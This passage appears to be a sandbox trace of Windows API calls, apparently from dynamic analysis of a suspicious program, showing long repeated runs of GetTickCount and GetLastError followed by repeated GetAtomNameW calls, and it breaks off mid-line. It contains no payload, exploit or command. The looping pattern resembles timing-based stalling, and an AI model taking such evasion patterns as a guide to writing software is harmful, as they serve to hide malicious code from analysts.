[0069.643] SetLastError (dwErrCode=0x0) [0069.643] GetLastError () returned 0x0 [0069.643] lstrlenA (lpString="") returned 0 [0069.643] GetTickCount () returned 0x1157d2c [0069.643] GetLastError () returned 0x0 [0069.643] GetTickCount () returned 0x1157d2c [0069.643] GetLastError () returned 0x0 [0069.643] GetTickCount () returned 0x1157d2c [0069.643] GetLastError () returned 0x0 [0069.644] GetTickCount () returned 0x1157d2c [0069.644] GetLastError () returned 0x0 [0069.644] GetTickCount () returned 0x1157d2c [0069.644] GetLastError () returned 0x0 [0069.644] GetTickCount () returned 0x1157d2c [0069.644] GetLastError () returned 0x0 [0069.644] GetTickCount () returned 0x1157d2c [0069.644] GetLastError () returned 0x0 [0069.644] GetTickCount () returned 0x1157d2c [0069.644] GetLastError () returned 0x0 [0069.644] GetTickCount () returned 0x1157d2c [0069.644] GetLastError () returned 0x0 [0069.644] GetTickCount () returned 0x1157d2c [0069.644] GetLastError () returned 0x0 [0069.644] GetTickCount () returned 0x1157d2c [0069.644] GetLastError () returned 0x0 [0069.644] GetTickCount () returned 0x1157d2c [0069.644] GetLastError () returned 0x0 [0069.644] GetTickCount () returned 0x1157d2c [0069.644] GetLastError () returned 0x0 [0069.644] GetTickCount () returned 0x1157d2c [0069.644] GetLastError () returned 0x0 [0069.644] GetTickCount () returned 0x1157d2c [0069.644] GetLastError () returned 0x0 [0069.644] GetTickCount () returned 0x1157d2c [0069.644] GetLastError () returned 0x0 [0069.645] GetTickCount () returned 0x1157d2c [0069.645] GetLastError () returned 0x0 [0069.645] GetTickCount () returned 0x1157d2c [0069.645] GetLastError () returned 0x0 [0069.645] GetTickCount () returned 0x1157d2c [0069.645] GetLastError () returned 0x0 [0069.645] GetTickCount () returned 0x1157d2c [0069.645] GetLastError () returned 0x0 [0069.645] GetTickCount () returned 0x1157d2c [0069.645] GetLastError () returned 0x0 [0069.645] GetTickCount () returned 0x1157d2c [0069.645] GetLastError () returned 0x0 [0069.645] GetTickCount () returned 0x1157d2c [0069.645] GetLastError () returned 0x0 [0069.645] GetTickCount () returned 0x1157d2c [0069.645] GetLastError () returned 0x0 [0069.645] GetTickCount () returned 0x1157d2c [0069.645] GetLastError () returned 0x0 [0069.645] GetTickCount () returned 0x1157d2c [0069.645] GetLastError () returned 0x0 [0069.645] GetTickCount () returned 0x1157d2c [0069.645] GetLastError () returned 0x0 [0069.645] GetTickCount () returned 0x1157d2c [0069.645] GetLastError () returned 0x0 [0069.645] GetTickCount () returned 0x1157d2c [0069.645] GetLastError () returned 0x0 [0069.646] GetTickCount () returned 0x1157d2c [0069.646] GetLastError () returned 0x0 [0069.646] GetTickCount () returned 0x1157d2c [0069.646] GetLastError () returned 0x0 [0069.646] GetTickCount () returned 0x1157d2c [0069.646] GetLastError () returned 0x0 [0069.646] GetTickCount () returned 0x1157d2c [0069.646] GetLastError () returned 0x0 [0069.646] GetTickCount () returned 0x1157d2c [0069.646] GetLastError () returned 0x0 [0069.646] GetTickCount () returned 0x1157d2c [0069.646] GetLastError () returned 0x0 [0069.646] GetTickCount () returned 0x1157d2c [0069.646] GetLastError () returned 0x0 [0069.649] GetTickCount () returned 0x1157d3b [0069.649] GetLastError () returned 0x0 [0069.649] GetTickCount () returned 0x1157d3b [0069.649] GetLastError () returned 0x0 [0069.649] GetTickCount () returned 0x1157d3b [0069.649] GetLastError () returned 0x0 [0069.649] GetTickCount () returned 0x1157d3b [0069.649] GetLastError () returned 0x0 [0069.649] GetTickCount () returned 0x1157d3b [0069.649] GetLastError () returned 0x0 [0069.649] GetTickCount () returned 0x1157d3b [0069.649] GetLastError () returned 0x0 [0069.649] GetTickCount () returned 0x1157d3b [0069.649] GetLastError () returned 0x0 [0069.649] GetTickCount () returned 0x1157d3b [0069.649] GetLastError () returned 0x0 [0069.649] GetTickCount () returned 0x1157d3b [0069.649] GetLastError () returned 0x0 [0069.649] GetTickCount () returned 0x1157d3b [0069.649] GetLastError () returned 0x0 [0069.649] GetTickCount () returned 0x1157d3b [0069.650] GetLastError () returned 0x0 [0069.650] GetTickCount () returned 0x1157d3b [0069.650] GetLastError () returned 0x0 [0069.650] GetTickCount () returned 0x1157d3b [0069.650] GetLastError () returned 0x0 [0069.650] GetTickCount () returned 0x1157d3b [0069.650] GetLastError () returned 0x0 [0069.650] GetTickCount () returned 0x1157d3b [0069.650] GetLastError () returned 0x0 [0069.650] GetTickCount () returned 0x1157d3b [0069.650] GetLastError () returned 0x0 [0069.650] GetTickCount () returned 0x1157d3b [0069.650] GetLastError () returned 0x0 [0069.650] GetTickCount () returned 0x1157d3b [0069.650] GetLastError () returned 0x0 [0069.650] GetTickCount () returned 0x1157d3b [0069.650] GetLastError () returned 0x0 [0069.650] GetTickCount () returned 0x1157d3b [0069.650] GetLastError () returned 0x0 [0069.650] GetTickCount () returned 0x1157d3b [0069.650] GetLastError () returned 0x0 [0069.650] GetTickCount () returned 0x1157d3b [0069.650] GetLastError () returned 0x0 [0069.650] GetTickCount () returned 0x1157d3b [0069.650] GetLastError () returned 0x0 [0069.650] GetTickCount () returned 0x1157d3b [0069.651] GetLastError () returned 0x0 [0069.651] GetTickCount () returned 0x1157d3b [0069.651] GetLastError () returned 0x0 [0069.651] GetTickCount () returned 0x1157d3b [0069.651] GetLastError () returned 0x0 [0069.651] GetTickCount () returned 0x1157d3b [0069.651] GetLastError () returned 0x0 [0069.651] GetTickCount () returned 0x1157d3b [0069.651] GetLastError () returned 0x0 [0069.651] GetTickCount () returned 0x1157d3b [0069.651] GetLastError () returned 0x0 [0069.651] GetTickCount () returned 0x1157d3b [0069.651] GetLastError () returned 0x0 [0069.651] GetTickCount () returned 0x1157d3b [0069.651] GetLastError () returned 0x0 [0069.651] GetTickCount () returned 0x1157d3b [0069.651] GetLastError () returned 0x0 [0069.651] GetTickCount () returned 0x1157d3b [0069.651] GetLastError () returned 0x0 [0069.651] GetTickCount () returned 0x1157d3b [0069.651] GetLastError () returned 0x0 [0069.651] GetTickCount () returned 0x1157d3b [0069.651] GetLastError () returned 0x0 [0069.651] GetTickCount () returned 0x1157d3b [0069.651] GetLastError () returned 0x0 [0069.652] GetTickCount () returned 0x1157d3b [0069.652] GetLastError () returned 0x0 [0069.652] GetTickCount () returned 0x1157d3b [0069.652] GetLastError () returned 0x0 [0069.652] GetTickCount () returned 0x1157d3b [0069.652] GetLastError () returned 0x0 [0069.652] GetTickCount () returned 0x1157d3b [0069.652] GetLastError () returned 0x0 [0069.652] GetTickCount () returned 0x1157d3b [0069.652] GetLastError () returned 0x0 [0069.652] GetTickCount () returned 0x1157d3b [0069.652] GetLastError () returned 0x0 [0069.652] GetTickCount () returned 0x1157d3b [0069.652] GetLastError () returned 0x0 [0069.652] GetTickCount () returned 0x1157d3b [0069.652] GetLastError () returned 0x0 [0069.652] GetTickCount () returned 0x1157d3b [0069.652] GetLastError () returned 0x0 [0069.652] GetTickCount () returned 0x1157d3b [0069.652] GetLastError () returned 0x0 [0069.652] GetTickCount () returned 0x1157d3b [0069.652] GetLastError () returned 0x0 [0069.653] GetTickCount () returned 0x1157d3b [0069.653] GetLastError () returned 0x0 [0069.653] GetTickCount () returned 0x1157d3b [0069.653] GetLastError () returned 0x0 [0069.653] GetTickCount () returned 0x1157d3b [0069.653] GetLastError () returned 0x0 [0069.653] GetTickCount () returned 0x1157d3b [0069.653] GetLastError () returned 0x0 [0069.653] GetTickCount () returned 0x1157d3b [0069.653] GetLastError () returned 0x0 [0069.653] GetTickCount () returned 0x1157d3b [0069.653] GetLastError () returned 0x0 [0069.653] GetTickCount () returned 0x1157d3b [0069.653] GetLastError () returned 0x0 [0069.653] GetTickCount () returned 0x1157d3b [0069.653] GetLastError () returned 0x0 [0069.653] GetTickCount () returned 0x1157d3b [0069.653] GetLastError () returned 0x0 [0069.653] GetTickCount () returned 0x1157d3b [0069.653] GetLastError () returned 0x0 [0069.653] GetTickCount () returned 0x1157d3b [0069.654] GetLastError () returned 0x0 [0069.654] GetTickCount () returned 0x1157d3b [0069.654] GetLastError () returned 0x0 [0069.654] GetTickCount () returned 0x1157d3b [0069.654] GetLastError () returned 0x0 [0069.654] GetTickCount () returned 0x1157d3b [0069.654] GetLastError () returned 0x0 [0069.654] GetTickCount () returned 0x1157d3b [0069.654] GetLastError () returned 0x0 [0069.654] GetTickCount () returned 0x1157d3b [0069.654] GetLastError () returned 0x0 [0069.654] GetTickCount () returned 0x1157d3b [0069.654] GetLastError () returned 0x0 [0069.654] GetTickCount () returned 0x1157d3b [0069.654] GetLastError () returned 0x0 [0069.654] GetTickCount () returned 0x1157d3b [0069.654] GetLastError () returned 0x0 [0069.654] GetTickCount () returned 0x1157d3b [0069.654] GetLastError () returned 0x0 [0069.654] GetTickCount () returned 0x1157d3b [0069.654] GetLastError () returned 0x0 [0069.655] GetTickCount () returned 0x1157d3b [0069.655] GetLastError () returned 0x0 [0069.655] GetTickCount () returned 0x1157d3b [0069.655] GetLastError () returned 0x0 [0069.655] GetTickCount () returned 0x1157d3b [0069.655] GetLastError () returned 0x0 [0069.655] GetTickCount () returned 0x1157d3b [0069.655] GetLastError () returned 0x0 [0069.655] GetTickCount () returned 0x1157d3b [0069.655] GetLastError () returned 0x0 [0069.655] GetTickCount () returned 0x1157d3b [0069.655] GetLastError () returned 0x0 [0069.655] GetTickCount () returned 0x1157d3b [0069.655] GetLastError () returned 0x0 [0069.655] GetTickCount () returned 0x1157d3b [0069.655] GetLastError () returned 0x0 [0069.655] GetTickCount () returned 0x1157d3b [0069.655] GetLastError () returned 0x0 [0069.655] GetTickCount () returned 0x1157d3b [0069.655] GetLastError () returned 0x0 [0069.656] GetTickCount () returned 0x1157d3b [0069.656] GetLastError () returned 0x0 [0069.656] GetTickCount () returned 0x1157d3b [0069.656] GetLastError () returned 0x0 [0069.656] GetTickCount () returned 0x1157d3b [0069.656] GetLastError () returned 0x0 [0069.656] GetTickCount () returned 0x1157d3b [0069.656] GetLastError () returned 0x0 [0069.656] GetTickCount () returned 0x1157d3b [0069.656] GetLastError () returned 0x0 [0069.656] GetTickCount () returned 0x1157d3b [0069.656] GetLastError () returned 0x0 [0069.656] GetTickCount () returned 0x1157d3b [0069.656] GetLastError () returned 0x0 [0069.656] GetTickCount () returned 0x1157d3b [0069.656] GetLastError () returned 0x0 [0069.656] GetTickCount () returned 0x1157d3b [0069.656] GetLastError () returned 0x0 [0069.656] GetTickCount () returned 0x1157d3b [0069.656] GetLastError () returned 0x0 [0069.656] GetTickCount () returned 0x1157d3b [0069.656] GetLastError () returned 0x0 [0069.656] GetTickCount () returned 0x1157d3b [0069.656] GetLastError () returned 0x0 [0069.656] GetTickCount () returned 0x1157d3b [0069.656] GetLastError () returned 0x0 [0069.656] GetTickCount () returned 0x1157d3b [0069.656] GetLastError () returned 0x0 [0069.656] GetTickCount () returned 0x1157d3b [0069.656] GetLastError () returned 0x0 [0069.656] GetTickCount () returned 0x1157d3b [0069.656] GetLastError () returned 0x0 [0069.657] GetTickCount () returned 0x1157d3b [0069.657] GetLastError () returned 0x0 [0069.657] GetTickCount () returned 0x1157d3b [0069.657] GetLastError () returned 0x0 [0069.657] GetTickCount () returned 0x1157d3b [0069.657] GetLastError () returned 0x0 [0069.657] GetTickCount () returned 0x1157d3b [0069.657] GetLastError () returned 0x0 [0069.657] GetTickCount () returned 0x1157d3b [0069.657] GetLastError () returned 0x0 [0069.657] GetTickCount () returned 0x1157d3b [0069.657] GetLastError () returned 0x0 [0069.657] GetTickCount () returned 0x1157d3b [0069.657] GetLastError () returned 0x0 [0069.657] GetTickCount () returned 0x1157d3b [0069.657] GetLastError () returned 0x0 [0069.657] GetTickCount () returned 0x1157d3b [0069.657] GetLastError () returned 0x0 [0069.657] GetTickCount () returned 0x1157d3b [0069.657] GetLastError () returned 0x0 [0069.657] GetTickCount () returned 0x1157d3b [0069.657] GetLastError () returned 0x0 [0069.657] GetTickCount () returned 0x1157d3b [0069.657] GetLastError () returned 0x0 [0069.657] GetTickCount () returned 0x1157d3b [0069.657] GetLastError () returned 0x0 [0069.657] GetTickCount () returned 0x1157d3b [0069.657] GetLastError () returned 0x0 [0069.657] GetTickCount () returned 0x1157d3b [0069.657] GetLastError () returned 0x0 [0069.658] GetTickCount () returned 0x1157d3b [0069.658] GetLastError () returned 0x0 [0069.658] GetTickCount () returned 0x1157d3b [0069.658] GetLastError () returned 0x0 [0069.658] GetTickCount () returned 0x1157d3b [0069.658] GetLastError () returned 0x0 [0069.658] GetTickCount () returned 0x1157d3b [0069.658] GetLastError () returned 0x0 [0069.658] GetTickCount () returned 0x1157d3b [0069.658] GetLastError () returned 0x0 [0069.658] GetTickCount () returned 0x1157d3b [0069.658] GetLastError () returned 0x0 [0069.658] GetTickCount () returned 0x1157d3b [0069.658] GetLastError () returned 0x0 [0069.658] GetTickCount () returned 0x1157d3b [0069.658] GetLastError () returned 0x0 [0069.658] GetTickCount () returned 0x1157d3b [0069.658] GetLastError () returned 0x0 [0069.658] GetTickCount () returned 0x1157d3b [0069.658] GetLastError () returned 0x0 [0069.658] GetTickCount () returned 0x1157d3b [0069.658] GetLastError () returned 0x0 [0069.658] GetTickCount () returned 0x1157d3b [0069.658] GetLastError () returned 0x0 [0069.658] GetTickCount () returned 0x1157d3b [0069.658] GetLastError () returned 0x0 [0069.658] GetTickCount () returned 0x1157d3b [0069.658] GetLastError () returned 0x0 [0069.659] GetTickCount () returned 0x1157d3b [0069.659] GetLastError () returned 0x0 [0069.659] GetTickCount () returned 0x1157d3b [0069.659] GetLastError () returned 0x0 [0069.659] GetTickCount () returned 0x1157d3b [0069.659] GetLastError () returned 0x0 [0069.659] GetTickCount () returned 0x1157d3b [0069.659] GetLastError () returned 0x0 [0069.659] GetTickCount () returned 0x1157d3b [0069.659] GetLastError () returned 0x0 [0069.659] GetTickCount () returned 0x1157d3b [0069.659] GetLastError () returned 0x0 [0069.659] GetTickCount () returned 0x1157d3b [0069.659] GetLastError () returned 0x0 [0069.659] GetTickCount () returned 0x1157d3b [0069.659] GetLastError () returned 0x0 [0069.659] GetTickCount () returned 0x1157d3b [0069.659] GetLastError () returned 0x0 [0069.659] GetTickCount () returned 0x1157d3b [0069.659] GetLastError () returned 0x0 [0069.659] GetTickCount () returned 0x1157d3b [0069.659] GetLastError () returned 0x0 [0069.659] GetTickCount () returned 0x1157d3b [0069.659] GetLastError () returned 0x0 [0069.659] GetTickCount () returned 0x1157d3b [0069.659] GetLastError () returned 0x0 [0069.659] GetTickCount () returned 0x1157d3b [0069.659] GetLastError () returned 0x0 [0069.659] GetTickCount () returned 0x1157d3b [0069.659] GetLastError () returned 0x0 [0069.660] GetTickCount () returned 0x1157d3b [0069.660] GetLastError () returned 0x0 [0069.660] GetTickCount () returned 0x1157d3b [0069.660] GetLastError () returned 0x0 [0069.660] GetTickCount () returned 0x1157d3b [0069.660] GetLastError () returned 0x0 [0069.660] GetTickCount () returned 0x1157d3b [0069.660] GetLastError () returned 0x0 [0069.660] GetTickCount () returned 0x1157d3b [0069.660] GetLastError () returned 0x0 [0069.660] GetTickCount () returned 0x1157d3b [0069.660] GetLastError () returned 0x0 [0069.660] GetTickCount () returned 0x1157d3b [0069.660] GetLastError () returned 0x0 [0069.660] GetTickCount () returned 0x1157d3b [0069.660] GetLastError () returned 0x0 [0069.660] GetTickCount () returned 0x1157d3b [0069.660] GetLastError () returned 0x0 [0069.660] GetTickCount () returned 0x1157d3b [0069.660] GetLastError () returned 0x0 [0069.660] GetTickCount () returned 0x1157d3b [0069.660] GetLastError () returned 0x0 [0069.660] GetTickCount () returned 0x1157d3b [0069.660] GetLastError () returned 0x0 [0069.660] GetTickCount () returned 0x1157d3b [0069.660] GetLastError () returned 0x0 [0069.660] GetTickCount () returned 0x1157d3b [0069.660] GetLastError () returned 0x0 [0069.660] GetTickCount () returned 0x1157d3b [0069.660] GetLastError () returned 0x0 [0069.660] GetTickCount () returned 0x1157d3b [0069.660] GetLastError () returned 0x0 [0069.661] GetTickCount () returned 0x1157d3b [0069.661] GetLastError () returned 0x0 [0069.661] GetTickCount () returned 0x1157d3b [0069.661] GetLastError () returned 0x0 [0069.661] GetTickCount () returned 0x1157d3b [0069.661] GetLastError () returned 0x0 [0069.661] GetTickCount () returned 0x1157d3b [0069.661] GetLastError () returned 0x0 [0069.661] GetTickCount () returned 0x1157d3b [0069.661] GetLastError () returned 0x0 [0069.661] GetTickCount () returned 0x1157d3b [0069.661] GetLastError () returned 0x0 [0069.661] GetTickCount () returned 0x1157d3b [0069.661] GetLastError () returned 0x0 [0069.661] GetTickCount () returned 0x1157d3b [0069.661] GetLastError () returned 0x0 [0069.661] GetTickCount () returned 0x1157d3b [0069.661] GetLastError () returned 0x0 [0069.661] GetTickCount () returned 0x1157d3b [0069.661] GetLastError () returned 0x0 [0069.661] GetTickCount () returned 0x1157d3b [0069.661] GetLastError () returned 0x0 [0069.661] GetTickCount () returned 0x1157d3b [0069.661] GetLastError () returned 0x0 [0069.661] GetTickCount () returned 0x1157d3b [0069.661] GetLastError () returned 0x0 [0069.661] GetTickCount () returned 0x1157d3b [0069.661] GetLastError () returned 0x0 [0069.661] GetTickCount () returned 0x1157d3b [0069.662] GetLastError () returned 0x0 [0069.662] GetTickCount () returned 0x1157d3b [0069.662] GetLastError () returned 0x0 [0069.662] GetTickCount () returned 0x1157d3b [0069.662] GetLastError () returned 0x0 [0069.662] GetTickCount () returned 0x1157d4b [0069.662] GetLastError () returned 0x0 [0069.662] GetTickCount () returned 0x1157d4b [0069.662] GetLastError () returned 0x0 [0069.662] GetTickCount () returned 0x1157d4b [0069.662] GetLastError () returned 0x0 [0069.662] GetTickCount () returned 0x1157d4b [0069.662] GetLastError () returned 0x0 [0069.662] GetTickCount () returned 0x1157d4b [0069.662] GetLastError () returned 0x0 [0069.662] GetTickCount () returned 0x1157d4b [0069.662] GetLastError () returned 0x0 [0069.663] GetTickCount () returned 0x1157d4b [0069.663] GetLastError () returned 0x0 [0069.663] GetTickCount () returned 0x1157d4b [0069.663] GetLastError () returned 0x0 [0069.663] GetTickCount () returned 0x1157d4b [0069.663] GetLastError () returned 0x0 [0069.663] GetTickCount () returned 0x1157d4b [0069.663] GetLastError () returned 0x0 [0069.663] GetTickCount () returned 0x1157d4b [0069.663] GetLastError () returned 0x0 [0069.663] GetTickCount () returned 0x1157d4b [0069.663] GetLastError () returned 0x0 [0069.663] GetTickCount () returned 0x1157d4b [0069.663] GetLastError () returned 0x0 [0069.663] GetTickCount () returned 0x1157d4b [0069.663] GetLastError () returned 0x0 [0069.663] GetTickCount () returned 0x1157d4b [0069.664] GetLastError () returned 0x0 [0069.664] GetTickCount () returned 0x1157d4b [0069.664] GetLastError () returned 0x0 [0069.664] GetTickCount () returned 0x1157d4b [0069.664] GetLastError () returned 0x0 [0069.664] GetTickCount () returned 0x1157d4b [0069.664] GetLastError () returned 0x0 [0069.664] GetTickCount () returned 0x1157d4b [0069.664] GetLastError () returned 0x0 [0069.664] GetTickCount () returned 0x1157d4b [0069.664] GetLastError () returned 0x0 [0069.664] GetTickCount () returned 0x1157d4b [0069.664] GetLastError () returned 0x0 [0069.664] GetTickCount () returned 0x1157d4b [0069.664] GetLastError () returned 0x0 [0069.664] GetTickCount () returned 0x1157d4b [0069.664] GetLastError () returned 0x0 [0069.664] GetTickCount () returned 0x1157d4b [0069.664] GetLastError () returned 0x0 [0069.664] GetTickCount () returned 0x1157d4b [0069.664] GetLastError () returned 0x0 [0069.664] GetTickCount () returned 0x1157d4b [0069.664] GetLastError () returned 0x0 [0069.664] GetTickCount () returned 0x1157d4b [0069.664] GetLastError () returned 0x0 [0069.664] GetTickCount () returned 0x1157d4b [0069.664] GetLastError () returned 0x0 [0069.664] GetTickCount () returned 0x1157d4b [0069.664] GetLastError () returned 0x0 [0069.665] GetTickCount () returned 0x1157d4b [0069.665] GetLastError () returned 0x0 [0069.665] GetTickCount () returned 0x1157d4b [0069.665] GetLastError () returned 0x0 [0069.665] GetTickCount () returned 0x1157d4b [0069.665] GetLastError () returned 0x0 [0069.665] GetTickCount () returned 0x1157d4b [0069.665] GetLastError () returned 0x0 [0069.665] GetTickCount () returned 0x1157d4b [0069.665] GetLastError () returned 0x0 [0069.665] GetTickCount () returned 0x1157d4b [0069.665] GetLastError () returned 0x0 [0069.665] GetTickCount () returned 0x1157d4b [0069.665] GetLastError () returned 0x0 [0069.665] GetTickCount () returned 0x1157d4b [0069.665] GetLastError () returned 0x0 [0069.665] GetTickCount () returned 0x1157d4b [0069.665] GetLastError () returned 0x0 [0069.665] GetTickCount () returned 0x1157d4b [0069.665] GetLastError () returned 0x0 [0069.665] GetTickCount () returned 0x1157d4b [0069.665] GetLastError () returned 0x0 [0069.665] GetTickCount () returned 0x1157d4b [0069.665] GetLastError () returned 0x0 [0069.665] GetTickCount () returned 0x1157d4b [0069.665] GetLastError () returned 0x0 [0069.792] lstrlenA (lpString="") returned 0 [0069.792] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.792] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.792] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.792] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.793] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.793] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.793] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.793] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.793] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.793] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.793] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.793] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.793] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.793] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.793] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.793] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.793] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.793] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.793] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.793] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.793] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.793] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.794] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.794] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.794] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.794] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.794] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.794] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.794] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.794] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.794] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.794] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.794] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.794] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.794] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.794] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.794] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.794] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.794] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.794] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.795] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.795] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.795] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.795] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.795] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.795] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.795] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.795] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.795] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.795] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.795] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.795] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.795] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.795] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.795] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.795] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.795] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.795] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.795] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.795] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.796] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.796] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.796] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.796] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.796] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.796] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.796] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.796] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.796] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.796] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, 